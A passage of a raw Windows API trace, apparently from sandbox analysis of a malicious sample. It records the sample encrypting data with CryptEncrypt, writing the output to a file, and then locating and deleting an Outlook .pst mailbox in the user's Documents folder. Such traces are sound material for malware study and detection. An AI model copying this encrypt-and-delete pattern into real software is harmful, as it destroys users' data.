returned 0 [0219.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0219.683] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72718*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72718*, pdwDataLen=0x8cef60*=0x8) returned 1 [0219.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.684] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0219.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.684] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0219.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.684] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0219.684] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.684] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0219.684] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.684] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.686] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.686] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.686] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.686] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.686] WriteFile (in: hFile=0x520, lpBuffer=0x2a72708*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72708*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0219.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.687] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0219.687] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.687] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0219.687] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.687] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.687] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.687] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0219.687] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.687] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0219.687] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0219.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0219.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab950, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0219.688] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0219.688] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.688] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.688] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0219.688] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.688] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0219.688] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.688] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.688] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0219.688] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0219.688] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0219.688] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0219.688] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0219.688] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0219.688] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.688] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.688] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0219.688] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.688] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0219.688] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0219.688] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.689] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0219.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.689] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0219.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.689] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0219.689] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.689] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0219.689] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.689] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.689] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.689] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.689] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.689] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.689] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.689] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.690] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0219.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.690] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0219.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0219.690] CryptReleaseContext (hProv=0xa7c908, dwFlags=0x0) returned 1 [0219.690] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.690] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.690] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.690] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0219.690] FreeLibrary (hLibModule=0x76390000) returned 1 [0219.690] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.690] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.690] CloseHandle (hObject=0x520) returned 1 [0219.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.691] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.691] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.691] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.691] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Outlook Files", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpFilePart=0x8cedf4*="Outlook Files") returned 0x27 [0219.691] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files")) returned 0x10 [0219.693] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa87f514a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddc1fe1e, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e21f8 [0219.693] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa87f514a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddc1fe1e, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0219.693] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddbf9d33, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 1 [0219.693] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst")) returned 1 [0219.694] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddbf9d33, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0 [0219.694] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0219.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854c68 | out: hHeap=0x2af0000) returned 1 [0219.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0219.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0219.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.694] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0219.695] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.695] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0219.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 